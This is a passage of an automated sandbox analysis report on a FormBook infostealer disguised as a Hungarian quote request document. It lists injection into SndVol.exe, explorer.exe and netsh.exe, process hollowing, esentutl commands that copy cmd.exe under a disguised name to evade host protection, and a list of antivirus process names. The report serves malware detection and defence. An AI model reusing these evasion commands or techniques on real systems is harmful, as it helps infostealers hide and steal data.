          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B136 mov eax, dword ptr fs:[00000030h]5_2_3658B136
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B136 mov eax, dword ptr fs:[00000030h]5_2_3658B136
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B136 mov eax, dword ptr fs:[00000030h]5_2_3658B136
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B136 mov eax, dword ptr fs:[00000030h]5_2_3658B136
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366631E1 mov eax, dword ptr fs:[00000030h]5_2_366631E1
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CD1D0 mov eax, dword ptr fs:[00000030h]5_2_365CD1D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CD1D0 mov ecx, dword ptr fs:[00000030h]5_2_365CD1D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366371F9 mov esi, dword ptr fs:[00000030h]5_2_366371F9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366651CB mov eax, dword ptr fs:[00000030h]5_2_366651CB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B51EF mov eax, dword ptr fs:[00000030h]5_2_365B51EF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365951ED mov eax, dword ptr fs:[00000030h]5_2_365951ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366411A4 mov eax, dword ptr fs:[00000030h]5_2_366411A4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366411A4 mov eax, dword ptr fs:[00000030h]5_2_366411A4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366411A4 mov eax, dword ptr fs:[00000030h]5_2_366411A4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366411A4 mov eax, dword ptr fs:[00000030h]5_2_366411A4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E7190 mov eax, dword ptr fs:[00000030h]5_2_365E7190
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36645180 mov eax, dword ptr fs:[00000030h]5_2_36645180
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36645180 mov eax, dword ptr fs:[00000030h]5_2_36645180
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365AB1B0 mov eax, dword ptr fs:[00000030h]5_2_365AB1B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CBE51 mov eax, dword ptr fs:[00000030h]5_2_365CBE51
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CBE51 mov eax, dword ptr fs:[00000030h]5_2_365CBE51
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A5E40 mov eax, dword ptr fs:[00000030h]5_2_365A5E40
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658BE78 mov ecx, dword ptr fs:[00000030h]5_2_3658BE78
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664DE46 mov eax, dword ptr fs:[00000030h]5_2_3664DE46
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36639E56 mov ecx, dword ptr fs:[00000030h]5_2_36639E56
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658DE10 mov eax, dword ptr fs:[00000030h]5_2_3658DE10
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CBE17 mov eax, dword ptr fs:[00000030h]5_2_365CBE17
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665E37 mov eax, dword ptr fs:[00000030h]5_2_36665E37
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665E37 mov eax, dword ptr fs:[00000030h]5_2_36665E37
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665E37 mov eax, dword ptr fs:[00000030h]5_2_36665E37
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591E30 mov eax, dword ptr fs:[00000030h]5_2_36591E30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591E30 mov eax, dword ptr fs:[00000030h]5_2_36591E30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36663E10 mov eax, dword ptr fs:[00000030h]5_2_36663E10
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36663E10 mov eax, dword ptr fs:[00000030h]5_2_36663E10
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365ADE2D mov eax, dword ptr fs:[00000030h]5_2_365ADE2D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365ADE2D mov eax, dword ptr fs:[00000030h]5_2_365ADE2D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365ADE2D mov eax, dword ptr fs:[00000030h]5_2_365ADE2D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665BEE6 mov eax, dword ptr fs:[00000030h]5_2_3665BEE6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665BEE6 mov eax, dword ptr fs:[00000030h]5_2_3665BEE6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665BEE6 mov eax, dword ptr fs:[00000030h]5_2_3665BEE6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665BEE6 mov eax, dword ptr fs:[00000030h]5_2_3665BEE6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658BEC0 mov eax, dword ptr fs:[00000030h]5_2_3658BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658BEC0 mov eax, dword ptr fs:[00000030h]5_2_3658BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3659BEC0 mov eax, dword ptr fs:[00000030h]5_2_3659BEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BFEC0 mov eax, dword ptr fs:[00000030h]5_2_365BFEC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661FEC5 mov eax, dword ptr fs:[00000030h]5_2_3661FEC5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593EF4 mov eax, dword ptr fs:[00000030h]5_2_36593EF4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593EF4 mov eax, dword ptr fs:[00000030h]5_2_36593EF4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593EF4 mov eax, dword ptr fs:[00000030h]5_2_36593EF4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C3EEB mov ecx, dword ptr fs:[00000030h]5_2_365C3EEB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C3EEB mov eax, dword ptr fs:[00000030h]5_2_365C3EEB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C3EEB mov eax, dword ptr fs:[00000030h]5_2_365C3EEB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593EE1 mov eax, dword ptr fs:[00000030h]5_2_36593EE1
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36649EDF mov eax, dword ptr fs:[00000030h]5_2_36649EDF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36649EDF mov eax, dword ptr fs:[00000030h]5_2_36649EDF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661DEAA mov eax, dword ptr fs:[00000030h]5_2_3661DEAA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597E96 mov eax, dword ptr fs:[00000030h]5_2_36597E96
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C3E8F mov eax, dword ptr fs:[00000030h]5_2_365C3E8F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663DEB0 mov eax, dword ptr fs:[00000030h]5_2_3663DEB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663DEB0 mov ecx, dword ptr fs:[00000030h]5_2_3663DEB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663DEB0 mov eax, dword ptr fs:[00000030h]5_2_3663DEB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663DEB0 mov eax, dword ptr fs:[00000030h]5_2_3663DEB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663DEB0 mov eax, dword ptr fs:[00000030h]5_2_3663DEB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664DEB0 mov eax, dword ptr fs:[00000030h]5_2_3664DEB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658FEA0 mov eax, dword ptr fs:[00000030h]5_2_3658FEA0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661DE9B mov eax, dword ptr fs:[00000030h]5_2_3661DE9B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658DEA5 mov eax, dword ptr fs:[00000030h]5_2_3658DEA5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658DEA5 mov ecx, dword ptr fs:[00000030h]5_2_3658DEA5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591F50 mov eax, dword ptr fs:[00000030h]5_2_36591F50
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C7F51 mov eax, dword ptr fs:[00000030h]5_2_365C7F51
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660FF42 mov eax, dword ptr fs:[00000030h]5_2_3660FF42
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BBF60 mov eax, dword ptr fs:[00000030h]5_2_365BBF60
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664DF2F mov eax, dword ptr fs:[00000030h]5_2_3664DF2F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36637F3E mov eax, dword ptr fs:[00000030h]5_2_36637F3E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661DF10 mov eax, dword ptr fs:[00000030h]5_2_3661DF10
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36611F13 mov eax, dword ptr fs:[00000030h]5_2_36611F13
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658BFD0 mov eax, dword ptr fs:[00000030h]5_2_3658BFD0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C1FCD mov eax, dword ptr fs:[00000030h]5_2_365C1FCD
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C1FCD mov eax, dword ptr fs:[00000030h]5_2_365C1FCD
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C1FCD mov eax, dword ptr fs:[00000030h]5_2_365C1FCD
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36593FC2 mov eax, dword ptr fs:[00000030h]5_2_36593FC2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664BFC0 mov ecx, dword ptr fs:[00000030h]5_2_3664BFC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664BFC0 mov eax, dword ptr fs:[00000030h]5_2_3664BFC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36663FC0 mov eax, dword ptr fs:[00000030h]5_2_36663FC0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CBFEC mov eax, dword ptr fs:[00000030h]5_2_365CBFEC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CBFEC mov eax, dword ptr fs:[00000030h]5_2_365CBFEC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365CBFEC mov eax, dword ptr fs:[00000030h]5_2_365CBFEC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36613FD7 mov eax, dword ptr fs:[00000030h]5_2_36613FD7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov ecx, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov ecx, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov eax, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov ecx, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov ecx, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov eax, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov ecx, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov ecx, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1F92 mov eax, dword ptr fs:[00000030h]5_2_365A1F92
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_01567450 MatchTagsInCmdLine,wcspbrk,GetProcessHeap,HeapAlloc,wcscpy_s,wcstok,MatchToken,PrintMessageFromModule,GetProcessHeap,HeapFree,wcscpy_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PrintMessageFromModule,PrintMessageFromModule,7_2_01567450
          Source: C:\Windows\SysWOW64\SndVol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_01569930 SetUnhandledExceptionFilter,7_2_01569930
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 7_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_015696E0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 47C0000 protect: page execute and read and writeJump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 47DF110Jump to behavior
          Drops or copies cmd.exe with a different name (likely to bypass HIPS)
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 47C0000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\SndVol.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\SndVol.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\SndVol.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 47C0000Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000002.4172198636.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4170358182.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
          Source: explorer.exe, 00000006.00000002.4169868345.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4170358182.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.1788732053.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4170358182.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029A5ACC
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: GetLocaleInfoA,0_2_029AA7C4
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029A5BD8
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: GetLocaleInfoA,0_2_029AA810
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A920C GetLocalTime,0_2_029A920C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029AB78C GetVersionExA,0_2_029AB78C

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
